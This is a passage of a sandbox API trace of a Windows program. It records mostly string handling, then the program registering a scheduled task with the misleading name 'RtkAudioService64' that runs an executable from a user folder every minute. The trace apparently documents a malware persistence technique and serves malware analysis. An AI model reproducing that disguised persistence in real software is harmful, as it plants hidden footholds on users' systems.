(lpString="|sd|") returned 4 [0212.562] lstrlenW (lpString="|F|") returned 3 [0212.562] StrStrIW (lpFirst="|sd|", lpSrch="|F|") returned 0x0 [0212.562] RtlRestoreLastWin32Error () returned 0x490 [0212.562] lstrlenW (lpString="ed") returned 2 [0212.562] lstrlenW (lpString="ed") returned 2 [0212.562] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.562] lstrlenW (lpString="F") returned 1 [0212.562] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.562] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4 [0212.562] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.562] lstrlenW (lpString="|ed|") returned 4 [0212.562] lstrlenW (lpString="|F|") returned 3 [0212.563] StrStrIW (lpFirst="|ed|", lpSrch="|F|") returned 0x0 [0212.563] RtlRestoreLastWin32Error () returned 0x490 [0212.563] lstrlenW (lpString="it") returned 2 [0212.563] lstrlenW (lpString="it") returned 2 [0212.563] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.563] lstrlenW (lpString="F") returned 1 [0212.563] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.563] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4 [0212.563] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.563] lstrlenW (lpString="|it|") returned 4 [0212.563] lstrlenW (lpString="|F|") returned 3 [0212.563] StrStrIW (lpFirst="|it|", lpSrch="|F|") returned 0x0 [0212.563] RtlRestoreLastWin32Error () returned 0x490 [0212.563] lstrlenW (lpString="et") returned 2 [0212.563] lstrlenW (lpString="et") returned 2 [0212.563] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.563] lstrlenW (lpString="F") returned 1 [0212.563] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.563] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4 [0212.563] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.563] lstrlenW (lpString="|et|") returned 4 [0212.563] lstrlenW (lpString="|F|") returned 3 [0212.563] StrStrIW (lpFirst="|et|", lpSrch="|F|") returned 0x0 [0212.563] RtlRestoreLastWin32Error () returned 0x490 [0212.563] lstrlenW (lpString="k") returned 1 [0212.563] lstrlenW (lpString="k") returned 1 [0212.563] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.564] lstrlenW (lpString="F") returned 1 [0212.564] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.564] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3 [0212.564] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.564] lstrlenW (lpString="|k|") returned 3 [0212.564] lstrlenW (lpString="|F|") returned 3 [0212.564] StrStrIW (lpFirst="|k|", lpSrch="|F|") returned 0x0 [0212.564] RtlRestoreLastWin32Error () returned 0x490 [0212.564] lstrlenW (lpString="du") returned 2 [0212.564] lstrlenW (lpString="du") returned 2 [0212.564] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.564] lstrlenW (lpString="F") returned 1 [0212.564] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.564] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4 [0212.564] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.564] lstrlenW (lpString="|du|") returned 4 [0212.564] lstrlenW (lpString="|F|") returned 3 [0212.564] StrStrIW (lpFirst="|du|", lpSrch="|F|") returned 0x0 [0212.564] RtlRestoreLastWin32Error () returned 0x490 [0212.564] lstrlenW (lpString="ri") returned 2 [0212.565] lstrlenW (lpString="ri") returned 2 [0212.565] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.565] lstrlenW (lpString="F") returned 1 [0212.565] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.565] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4 [0212.565] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.565] lstrlenW (lpString="|ri|") returned 4 [0212.565] lstrlenW (lpString="|F|") returned 3 [0212.565] StrStrIW (lpFirst="|ri|", lpSrch="|F|") returned 0x0 [0212.565] RtlRestoreLastWin32Error () returned 0x490 [0212.565] lstrlenW (lpString="z") returned 1 [0212.565] lstrlenW (lpString="z") returned 1 [0212.565] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.565] lstrlenW (lpString="F") returned 1 [0212.565] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.565] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3 [0212.565] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.565] lstrlenW (lpString="|z|") returned 3 [0212.565] lstrlenW (lpString="|F|") returned 3 [0212.565] StrStrIW (lpFirst="|z|", lpSrch="|F|") returned 0x0 [0212.565] RtlRestoreLastWin32Error () returned 0x490 [0212.565] lstrlenW (lpString="f") returned 1 [0212.566] lstrlenW (lpString="f") returned 1 [0212.566] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.566] lstrlenW (lpString="F") returned 1 [0212.566] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.566] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0212.566] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.566] lstrlenW (lpString="|f|") returned 3 [0212.566] lstrlenW (lpString="|F|") returned 3 [0212.566] StrStrIW (lpFirst="|f|", lpSrch="|F|") returned="|f|" [0212.566] RtlRestoreLastWin32Error () returned 0x0 [0212.566] RtlRestoreLastWin32Error () returned 0x0 [0212.566] GetProcessHeap () returned 0x1b0000 [0212.566] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9510 [0212.566] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.566] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0212.566] lstrlenW (lpString="MINUTE") returned 6 [0212.566] GetProcessHeap () returned 0x1b0000 [0212.566] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xe) returned 0x1bac60 [0212.567] GetThreadLocale () returned 0x409 [0212.567] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="minute", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 2 [0212.567] RtlRestoreLastWin32Error () returned 0x0 [0212.567] GetProcessHeap () returned 0x1b0000 [0212.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x1fc) returned 0x1b9e00 [0212.567] GetProcessHeap () returned 0x1b0000 [0212.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9550 [0212.567] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.567] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0212.567] lstrlenW (lpString="First") returned 5 [0212.567] GetProcessHeap () returned 0x1b0000 [0212.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xc) returned 0x1bac78 [0212.567] GetProcessHeap () returned 0x1b0000 [0212.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b95d0 [0212.567] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.567] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0212.567] lstrlenW (lpString="Second") returned 6 [0212.567] GetProcessHeap () returned 0x1b0000 [0212.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xe) returned 0x1baca8 [0212.567] GetProcessHeap () returned 0x1b0000 [0212.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9490 [0212.567] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.568] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0212.569] lstrlenW (lpString="Third") returned 5 [0212.569] GetProcessHeap () returned 0x1b0000 [0212.569] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xc) returned 0x1babb8 [0212.569] GetProcessHeap () returned 0x1b0000 [0212.569] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b93f0 [0212.569] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.569] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0212.569] lstrlenW (lpString="Fourth") returned 6 [0212.569] GetProcessHeap () returned 0x1b0000 [0212.569] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xe) returned 0x1badb0 [0213.112] GetProcessHeap () returned 0x1b0000 [0213.112] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b95f0 [0213.112] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0213.112] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0213.113] lstrlenW (lpString="Last") returned 4 [0213.113] GetProcessHeap () returned 0x1b0000 [0213.113] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xa) returned 0x1badc8 [0213.113] lstrlenW (lpString="1") returned 1 [0213.113] _wtol (_String="1") returned 1 [0213.114] GetProcessHeap () returned 0x1b0000 [0213.114] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b9630 [0213.114] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0213.114] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0213.114] lstrlenW (lpString="First") returned 5 [0213.114] GetProcessHeap () returned 0x1b0000 [0213.114] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xc) returned 0x1bad68 [0213.114] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0213.114] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0213.114] lstrlenW (lpString="Second") returned 6 [0213.114] GetProcessHeap () returned 0x1b0000 [0213.114] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0xe) returned 0x1bac30 [0213.114] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0213.114] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0213.115] lstrlenW (lpString="Third") returned 5 [0213.115] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0213.115] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0213.115] lstrlenW (lpString="Fourth") returned 6 [0213.115] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0213.115] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0213.115] lstrlenW (lpString="Last") returned 4 [0213.116] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xdcde8, cchData=128 | out: lpLCData="0") returned 2 [0213.116] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0213.116] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0213.116] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0213.116] GetProcessHeap () returned 0x1b0000 [0213.116] GetProcessHeap () returned 0x1b0000 [0213.116] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1bac78) returned 1 [0213.116] GetProcessHeap () returned 0x1b0000 [0213.116] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1bac78) returned 0xc [0213.116] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1bac78) returned 1 [0213.116] GetProcessHeap () returned 0x1b0000 [0213.116] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x16) returned 0x1b9410 [0213.116] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xdcdec, cchData=128 | out: lpLCData="0") returned 2 [0213.117] _memicmp (_Buf1=0x1b73c0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0213.117] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x1ba7e0, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0213.117] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0213.117] GetProcessHeap () returned 0x1b0000 [0213.117] GetProcessHeap () returned 0x1b0000 [0213.117] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1baca8) returned 1 [0213.117] GetProcessHeap () returned 0x1b0000 [0213.117] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1baca8) returned 0xe [0213.117] RtlFreeHeap (HeapHandle=0x1b0000, Flags=0x0, BaseAddress=0x1baca8) returned 1 [0213.117] GetProcessHeap () returned 0x1b0000 [0213.117] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x16) returned 0x1b9430 [0213.117] GetLocalTime (in: lpSystemTime=0xdcfcc | out: lpSystemTime=0xdcfcc*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0x26, wMilliseconds=0x249)) [0213.117] lstrlenW (lpString="") returned 0 [0213.117] GetLocalTime (in: lpSystemTime=0xdd480 | out: lpSystemTime=0xdd480*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0x26, wMilliseconds=0x249)) [0213.117] lstrlenW (lpString="") returned 0 [0213.117] lstrlenW (lpString="") returned 0 [0213.117] lstrlenW (lpString="") returned 0 [0213.118] lstrlenW (lpString="") returned 0 [0213.118] lstrlenW (lpString="1") returned 1 [0213.118] _wtol (_String="1") returned 1 [0213.118] lstrlenW (lpString="") returned 0 [0213.118] lstrlenW (lpString="") returned 0 [0213.118] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0213.183] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0217.757] CoCreateInstance (in: rclsid=0x3a26c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x3a26d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdd39c | out: ppv=0xdd39c*=0x4633790) returned 0x0 [0217.880] TaskScheduler:ITaskService:Connect (This=0x4633790, serverName=0xdd34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xdd35c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xdd36c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0219.614] TaskScheduler:ITaskService:GetFolder (in: This=0x4633790, Path=0x0, ppFolder=0xdd464 | out: ppFolder=0xdd464*=0x46338b8) returned 0x0 [0219.618] TaskScheduler:ITaskService:NewTask (in: This=0x4633790, flags=0x0, ppDefinition=0xdd474 | out: ppDefinition=0xdd474*=0x4633908) returned 0x0 [0219.619] ITaskDefinition:get_Actions (in: This=0x4633908, ppActions=0xdd3e8 | out: ppActions=0xdd3e8*=0x4633958) returned 0x0 [0219.619] IActionCollection:Create (in: This=0x4633958, Type=0, ppAction=0xdd3ec | out: ppAction=0xdd3ec*=0x4633bb0) returned 0x0 [0219.620] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0219.620] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0219.620] lstrlenW (lpString=" ") returned 1 [0219.620] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x68) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x4a) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x4e) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x46) returned 0x0 [0219.620] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x76) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x7a) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x58) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x62) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x75) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x53) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x79) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0219.621] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x66) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0219.622] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0219.622] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0219.622] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe", wMatch=0x20) returned 0x0 [0219.622] RtlRestoreLastWin32Error () returned 0x490 [0219.623] IUnknown:Release (This=0x4633bb0) returned 0x1 [0219.623] IUnknown:Release (This=0x4633958) returned 0x1 [0219.623] ITaskDefinition:get_Triggers (in: This=0x4633908, ppTriggers=0xdcfb8 | out: ppTriggers=0xdcfb8*=0x4633af8) returned 0x0 [0219.623] ITriggerCollection:Create (in: This=0x4633af8, Type=1, ppTrigger=0xdcfcc | out: ppTrigger=0xdcfcc*=0x4633bf0) returned 0x0 [0219.623] lstrlenW (lpString="1") returned 1 [0219.623] _vsnwprintf (in: _Buffer=0xdcf6c, _BufferCount=0xf, _Format="PT%sM", _ArgList=0xdcf60 | out: _Buffer="PT1M") returned 4 [0219.624] ITrigger:get_Repetition (in: This=0x4633bf0, ppRepeat=0xdcfc8 | out: ppRepeat=0xdcfc8*=0x4633c40) returned 0x0 [0219.624] IRepetitionPattern:put_Interval (This=0x4633c40, Interval="PT1M") returned 0x0 [0219.624] IUnknown:Release (This=0x4633c40) returned 0x1 [0219.624] _vsnwprintf (in: _Buffer=0xdcf3c, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0xdcf1c | out: _Buffer="2021-09-28T12:17:00") returned 19 [0219.700] ITrigger:put_StartBoundary (This=0x4633bf0, StartBoundary="2021-09-28T12:17:00") returned 0x0 [0219.700] lstrlenW (lpString="") returned 0 [0219.700] lstrlenW (lpString="") returned 0 [0219.701] lstrlenW (lpString="") returned 0 [0219.701] lstrlenW (lpString="") returned 0 [0219.701] IUnknown:Release (This=0x4633bf0) returned 0x1 [0219.701] IUnknown:Release (This=0x4633af8) returned 0x1 [0219.701] ITaskDefinition:get_Settings (in: This=0x4633908, ppSettings=0xdd3f4 | out: ppSettings=0xdd3f4*=0x4633a10) returned 0x0 [0219.701] lstrlenW (lpString="") returned 0 [0219.701] IUnknown:Release (This=0x4633a10) returned 0x3 [0219.701] GetLocalTime (in: lpSystemTime=0xdd2e8 | out: lpSystemTime=0xdd2e8*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0x2d, wMilliseconds=0xa9)) [0219.701] ResolveDelayLoadedAPI () returned 0x7462c5f0 [0219.702] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xdd2f8, nSize=0xdd2e0 | out: lpNameBuffer="XC64ZB\\RDhJ0CNFevzX", nSize=0xdd2e0) returned 0x1 [0219.702] ITaskDefinition:get_RegistrationInfo (in: This=0x4633908, ppRegistrationInfo=0xdd2e4 | out: ppRegistrationInfo=0xdd2e4*=0x46339a0) returned 0x0 [0219.703] IRegistrationInfo:put_Author (This=0x46339a0, Author="XC64ZB\\RDhJ0CNFevzX") returned 0x0 [0219.703] _vsnwprintf (in: _Buffer=0xdd2f8, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0xdd2b8 | out: _Buffer="2021-09-28T12:17:45") returned 19 [0219.703] IRegistrationInfo:put_Date (This=0x46339a0, Date="2021-09-28T12:17:45") returned 0x0 [0219.703] IUnknown:Release (This=0x46339a0) returned 0x1 [0219.704] malloc (_Size=0xc) returned 0x4633c78 [0219.704] free (_Block=0x4633c78) [0219.704] lstrlenW (lpString="") returned 0 [0219.704] malloc (_Size=0xc) returned 0x4633c78 [0219.704] ITaskFolder:RegisterTaskDefinition (This=0x46338b8, Path="RtkAudioService64", pDefinition=0x4633908, flags=6, UserId=0xdd3d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0xdd3fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xdd444) Thread: id = 314 os_tid = 0xdec Process: id = "81" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x34519000" os_pid = "0x133c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "80" os_parent_pid = "0x1310" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2257 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2258 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2259 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2260 start_va = 0x200000 end_va = 